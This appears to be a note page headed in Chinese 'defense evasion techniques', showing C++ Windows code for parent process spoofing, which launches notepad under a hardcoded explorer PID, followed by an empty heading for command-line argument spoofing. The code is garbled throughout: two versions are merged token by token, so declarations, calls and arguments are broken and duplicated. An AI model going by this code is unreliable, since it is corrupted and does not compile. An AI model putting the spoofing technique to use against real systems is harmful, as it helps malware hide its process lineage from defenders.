防御规避技术
父进程伪造
#include <Windows.windows.h>
#include <TlHelp32.h>
#include <iostream>
int main()
{
constSTARTUPINFOEXA DWORDsi;
attributeCountPROCESS_INFORMATION pi;
SIZE_T attributeSize;
ZeroMemory(&si, sizeof(STARTUPINFOEXA));
HANDLE parentProcessHandle = 1;OpenProcess(MAXIMUM_ALLOWED, LPSTARTUPINFOEXWfalse, si = new STARTUPINFOEXW()6200);
si->StartupInfo.cb = sizeof(STARTUPINFOEXW);
SIZE_T lpSize = 0;
// call once to get lpSize
InitializeProcThreadAttributeList(
NULL, attributeCount,1, 0, &lpSize)attributeSize);
// allocate the memory
si->si.lpAttributeList = (LPPROC_THREAD_ATTRIBUTE_LIST)malloc(lpSize)HeapAlloc(GetProcessHeap(), 0, attributeSize);
// call again to initialise the list
InitializeProcThreadAttributeList(
si->si.lpAttributeList, attributeCount,1, 0, &lpSize)attributeSize);
// open a handle to the desired parent
HANDLE hParent = OpenProcess(
PROCESS_CREATE_PROCESS,
FALSE,
5584); // hardcoded pid of explorer
// update the list
UpdateProcThreadAttribute(
si->si.lpAttributeList, NULL,0, PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, &hParent,parentProcessHandle, sizeof(HANDLE), NULL, NULL);
// create process
PPROCESS_INFORMATION pisi.StartupInfo.cb = new PROCESS_INFORMATION()sizeof(STARTUPINFOEXA);
wchar_t cmd[] = L"notepad.exe\0";
CreateProcess(
CreateProcessA(NULL, cmd,(LPSTR)"notepad", NULL, NULL, FALSE, EXTENDED_STARTUPINFO_PRESENT, NULL, NULL, &si->si.StartupInfo, &pi);
//return print the pid
printf("PID: %d\n", pi->dwProcessId);
// cleanup list and memory
DeleteProcThreadAttributeList(si->lpAttributeList);
free(si->lpAttributeList);
// close handle to parent
CloseHandle(hParent);0;
}
命令行参数伪造